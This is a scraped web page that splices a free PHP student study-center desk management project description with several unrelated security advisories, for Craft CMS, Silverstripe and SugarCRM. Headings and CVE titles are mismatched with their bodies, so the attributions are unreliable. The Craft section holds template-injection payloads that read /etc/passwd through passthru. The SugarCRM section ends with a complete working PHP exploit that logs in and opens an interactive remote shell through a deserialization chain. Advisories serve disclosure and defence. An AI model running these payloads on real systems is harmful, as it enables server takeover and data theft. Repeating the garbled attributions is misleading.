This project is entitled **Student Study Center Desk Management System**. It is a web-based application that was mainly developed using **PHP Language** and **MySQL Database**. The project's main purpose is to provide certain study center with a platform for managing the students' assigned or allocated desks. It has a pleasant user interface using **Bootstrap Framework** and **AdminLTE Template**. The project also contains multiple user-friendly features and functionalities.

****How does the Student Study Center Desk Management System?****

The Student Study Center Desk Management System is a project with one module which is the management site only that can be accessed by Administrator or Staff users. Here, the study center management can simply allocate or assign and unassign students to specific desks. The management is required to populate the list of students and list of the desk upon using the system for the first time. To manage the student desk allocation, management can simply redirect to the **"Assign"** page and select the student's name. Then, they can simply assign the student to a certain desk and manage the list of the history of the assigned records. This system also contains date-wise reports.

****What are the Features and Functionalities?****

The Student Study Center Desk Management System contains the following features and functionalities:

*   **Login and Logout**
*   **Dashboard Page**
*   **Student List Management**
*   **Desk List Management**
*   **Manage Student Desk Allocation**
*   **Generate Date-wise Reports**
*   **Manage System Users**
*   **Manage System Information**
*   **Update Account Details**

****What are the Technologies used?****

Here are the technologies that I used to develop this **Student Study Center Desk Management System**:

*   **XAMPP**
*   **VS Code Editor**
*   **MySQL Database**
*   **HTML**
*   **CSS**
*   **JavaScript**
*   **jQuery**
*   **Ajax**
*   **DataTables Library**
*   **Select2 Library**
*   **Bootstrap Framework**
*   **AdminLTE Template**
*   **Fontawesome Icons**

****Snapshots********Dashboard****

****Student List****

****Desk List****

****Student Assign/Unassigned Records****

****Reports****

The **Students Study Center Desk Management System** project source code zip file is provided on this website and it is free to download. The project was mainly developed for educational purposes only. Feel free to download and modify the project source code to meet your own requirements.

****How to Run?****

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)

****System Installation/Setup****

1.  **Enable** the **GD Library** in your **php.ini** file.
2.  **Open** your **XAMPP Control Panel** and start ****Apache**** and ****MySQL****.
3.  **Extract** the **downloaded source code **zip** file**.
4.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
5.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
6.  **Create** a **new database** named ****sscdms\_db****.
7.  **Import** the provided ****SQL**** file. The file is known as ****sscdms\_db.sql**** located inside the **database** folder.
8.  **Browse** the **Student Study Center Desk Management System** in a **browser**. i.e. ****http://localhost/php-sscdms/****.

****Default Admin Access****

Username: **admin**  
Password: **admin123**

****DEMO VIDEO****

That's it! I hope this **Student Study Center Desk Management System using PHP (OOP) and MySQL DB Free Source Code Project** will help you with what you are looking for and that you'll find something useful for your current and future PHP Projects.

Explore more on this website for more **Tutorials** and **Free Source Codes**.

****Enjoy =)****

*   4512 views

CVE-2023-36317: Student Study Center Desk Management System using PHP (OOP) and MySQL DB Free Source Code

Craft is a CMS for creating custom digital experiences on the web and beyond. Bypassing the validatePath function can lead to potential remote code execution. This vulnerability can lead to malicious control of vulnerable systems and data exfiltrations. Although the vulnerability is exploitable only in the authenticated users, configuration with ALLOW_ADMIN_CHANGES=true, there is still a potential security threat (Remote Code Execution). This issue has been patched in version 4.4.15 and version 3.8.15.


**Package**

**Affected versions**

\>= 4.0.0-RC1, <= 4.4.14

\>= 3.0.0, <= 3.8.14

**Patched versions**

4.4.15

3.8.15

**Summary**

Bypassing the validatePath function can lead to potential Remote Code Execution  
(Post-authentication, ALLOW\_ADMIN\_CHANGES=true)

**Details**

In bootstrap.php, the SystemPaths path is set as below.

// Set the vendor path. By default assume that it's 4 levels up from here
$vendorPath = $findConfigPath('--vendorPath', 'CRAFT\_VENDOR\_PATH') ?? dirname(\_\_DIR\_\_, 3);

// Set the "project root" path that contains config/, storage/, etc. By default assume that it's up a level from vendor/.
$rootPath = $findConfigPath('--basePath', 'CRAFT\_BASE\_PATH') ?? dirname($vendorPath);

// By default the remaining directories will be in the base directory
$dotenvPath = $findConfigPath('--dotenvPath', 'CRAFT\_DOTENV\_PATH') ?? "$rootPath/.env";
$configPath = $findConfigPath('--configPath', 'CRAFT\_CONFIG\_PATH') ?? "$rootPath/config";
$contentMigrationsPath = $findConfigPath('--contentMigrationsPath', 'CRAFT\_CONTENT\_MIGRATIONS\_PATH') ?? "$rootPath/migrations";
$storagePath = $findConfigPath('--storagePath', 'CRAFT\_STORAGE\_PATH') ?? "$rootPath/storage";
$templatesPath = $findConfigPath('--templatesPath', 'CRAFT\_TEMPLATES\_PATH') ?? "$rootPath/templates";
$translationsPath = $findConfigPath('--translationsPath', 'CRAFT\_TRANSLATIONS\_PATH') ?? "$rootPath/translations";
$testsPath = $findConfigPath('--testsPath', 'CRAFT\_TESTS\_PATH') ?? "$rootPath/tests";

Because paths are validated based on the /path1/path2 format, this can be bypassed using a file URI scheme such as file:///path1/path2. File scheme is supported in mkdir()

    /\*\*
     \* @param string $attribute
     \* @param array|null $params
     \* @param InlineValidator $validator
     \* @return void
     \* @since 4.4.6
     \*/
    public function validatePath(string $attribute, ?array $params, InlineValidator $validator): void
    {
        // Make sure it’s not within any of the system directories
        $path = FileHelper::absolutePath($this\->getRootPath(), '/');

        $systemDirs = Craft::$app\->getPath()->getSystemPaths();

        foreach ($systemDirs as $dir) {
            $dir = FileHelper::absolutePath($dir, '/');
            if (str\_starts\_with("$path/", "$dir/")) {
                $validator\->addError($this, $attribute, Craft::t('app', 'Local volumes cannot be located within system directories.'));
                break;
            }
        }
    }

ref. https://www.php.net/manual/en/wrappers.file.php

**PoC**

1.  Create a new filesystem. **Base Path: file:///var/www/html/templates**

2.  Create a new asset volume. Asset Filesystem: local\_bypass

3.  Upload a ttml file with rce template code. Confirm poc.ttml file created in /var/www/html/templates

{{'<pre>'}}
{{1337\*1337}}
{{\['cat /etc/passwd'\]|map('passthru')|join}}
{{\['id;pwd;ls -altr /'\]|map('passthru')|join}}

  

4.  Create a new route. URI: \* , Template: poc.ttml

5.  Confirm RCE on arbitrary path ( /\* )

**PoC Env**

**Impact**

Take control of vulnerable systems, Data exfiltrations, Malware execution, Pivoting, etc.

although the vulnerability is exploitable only in the authenticated users, configuration with ALLOW\_ADMIN\_CHANGES=true, there is still a potential security threat (Remote Code Execution)

CVE-2023-40035: Remote Code Execution via validatePath bypass

TinyMCE 4.x is vulnerable to several XSS vectors, which had been patched in later versions. Two of these have been identified as affecting silverstripe/admin.

Only Silverstripe CMS 4 is affected by these vulnerabilities. It's not possible to upgrade Silverstripe CMS 4 to use a more recent release of TinyMCE without introducing breaking changes. Instead, the security patches that shipped in later releases of TinyMCE have been backported to the TinyMCE version bundled in silverstripe/admin.

Silverstripe CMS 5 is not affected by these vulnerabilities because it uses TinyMCE 6.

**Package**

composer silverstripe/admin (Composer)

**Affected versions**

\>= 1.0.0, < 1.13.6

**Patched versions**

1.13.6

**Description**

TinyMCE 4.x is vulnerable to several XSS vectors, which had been patched in later versions. Two of these have been identified as affecting silverstripe/admin.

Only Silverstripe CMS 4 is affected by these vulnerabilities. It's not possible to upgrade Silverstripe CMS 4 to use a more recent release of TinyMCE without introducing breaking changes. Instead, the security patches that shipped in later releases of TinyMCE have been backported to the TinyMCE version bundled in silverstripe/admin.

Silverstripe CMS 5 is not affected by these vulnerabilities because it uses TinyMCE 6.

**References**

*   https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/admin/SS-2023-002.yaml
*   https://www.silverstripe.org/download/security-releases/SS-2023-002

Published to the GitHub Advisory Database

Aug 23, 2023

Reviewed

Aug 23, 2023

GHSA-jxcx-3h54-qqxx: SilverStripe CMS Cross-site Scripting vulnerabilities inherited from TinyMCE

SugarCRM versions 12.2.0 and below suffer from multiple remote SQL injection vulnerabilities.

----------------------------------------------------  
SugarCRM <= 12.2.0 Two SQL Injection Vulnerabilities  
----------------------------------------------------

[-] Software Link:

https://www.sugarcrm.com

[-] Affected Versions:

Version 12.2.0 and prior versions.  
Version 12.0.2 and prior versions.  
Version 11.0.5 and prior versions.

[-] Vulnerabilities Description:

1) User input passed through the “metrics” parameter to the   
“/Forecasts/metrics”  
REST API endpoint is not properly sanitized before being used to   
construct a SQL  
query. This can be exploited by malicious users to e.g. read sensitive   
data from  
the database through in-band SQL Injection attacks.

2) User input passed through the “placeholder_fields” parameter to the   
e.g.  
“/Notes/{recordID}/link/history” REST API endpoint is not properly   
sanitized before  
being used to construct a SQL query. This can be exploited by malicious   
users to  
e.g. read sensitive data from the database through in-band SQL Injection   
attacks.

[-] Proof of Concept:

https://karmainsecurity.com/pocs/CVE-2023-35811_1.php  
https://karmainsecurity.com/pocs/CVE-2023-35811_2.php

[-] Solution:

Upgrade to version 12.3.0, 12.0.3, 11.0.6, or later.

[-] Disclosure Timeline:

[14/02/2023] - Vendor notified  
[12/04/2023] - Fixed versions released  
[17/06/2023] - CVE number assigned  
[23/08/2023] - Publication of this advisory

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)  
has assigned the name CVE-2023-35811 to these vulnerabilities.

[-] Credits:

Vulnerabilities discovered by Egidio Romano.

[-] Original Advisory:

https://karmainsecurity.com/KIS-2023-08

[-] Other References:

https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-008/

SugarCRM 12.2.0 SQL Injection

SugarCRM versions 12.2.0 and below suffer from a PHP object injection vulnerability.

    -------------------------------------------------------------------------------SugarCRM <= 12.2.0 (Docusign_GlobalSettings) PHP Object Injection Vulnerability-------------------------------------------------------------------------------[-] Software Link:https://www.sugarcrm.com[-] Affected Versions:Version 12.2.0 and prior versions.Version 12.0.2 and prior versions.Version 11.0.5 and prior versions.[-] Vulnerability Description:There is a Second-Order PHP Object Injection vulnerability which might allow maliciousadmin users to execute arbitrary PHP code on the web server (RCE) by storing maliciousserialized objects into the database.The vulnerability can be triggered by invoking the "/DocuSign/getGlobalConfig" REST APIendpoint, which is using the unserialize() PHP function with the "Docusign_GlobalSettings"parameter. This can be exploited to inject arbitrary PHP objects into the applicationscope, allowing an attacker to perform a variety of attacks.[-] Proof of Concept:https://karmainsecurity.com/pocs/CVE-2023-35810.php[Packet Storm Note: see below][-] Solution:Upgrade to version 12.3.0, 12.0.3, 11.0.6, or later.[-] Disclosure Timeline:[14/02/2023] - Vendor notified[12/04/2023] - Fixed versions released[17/06/2023] - CVE number assigned[23/08/2023] - Publication of this advisory[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org)has assigned the name CVE-2023-35810 to this vulnerability.[-] Credits:Vulnerability discovered by Egidio Romano.[-] Original Advisory:https://karmainsecurity.com/KIS-2023-07[-] Other References:https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-009/---- poc ----<?phpset_time_limit(0);error_reporting(E_ERROR);if (!extension_loaded("curl")) die("[-] cURL extension required!\n");if ($argc != 4) die("Usage: php $argv[0] <URL> <username> <password>\n");include("chain.php");function inject_pop_chain($cmd){  global $ch, $url;  $pop = new \Monolog\Handler\BufferHandler(["current", "system"], [$cmd, "level" => null]);  $pop = new \Monolog\Handler\SyslogUdpHandler($pop);  $pop = base64_encode(serialize($pop));  curl_setopt($ch, CURLOPT_URL, "{$url}rest/v11_18/Administration/config/Docusign");  curl_setopt($ch, CURLOPT_POSTFIELDS, '{"Docusign_GlobalSettings":"'.$pop.'"}');  curl_exec($ch);}list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];print "[+] Logging in with username '{$user}' and password '{$pass}'\n";$ch = curl_init();$params = ["username" => $user, "password" => $pass, "grant_type" => "password", "client_id" => "sugar"];curl_setopt($ch, CURLOPT_URL, "{$url}rest/v11_18/oauth2/token");curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($params));curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json"]);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);if (($token = (json_decode(curl_exec($ch)))->access_token) == null) die("[+] Login failed!\n");curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json", "OAuth-Token: {$token}"]);print "[+] Launching shell\n";while(1){  print "\nsugar-shell# ";  if (($cmd = trim(fgets(STDIN))) == "exit") break;  inject_pop_chain($cmd);  curl_setopt($ch, CURLOPT_URL, "{$url}rest/v11_18/DocuSign/getGlobalConfig");   curl_setopt($ch, CURLOPT_POST, false);  preg_match("/(.+)/s", curl_exec($ch), $m) ? print $m[1] : die("\n[+] Exploit failed!\n");}// cleaningcurl_setopt($ch, CURLOPT_URL, "{$url}rest/v11_18/Administration/config/Docusign");curl_setopt($ch, CURLOPT_POSTFIELDS, '{"Docusign_GlobalSettings":""}');curl_exec($ch);

Tag

#php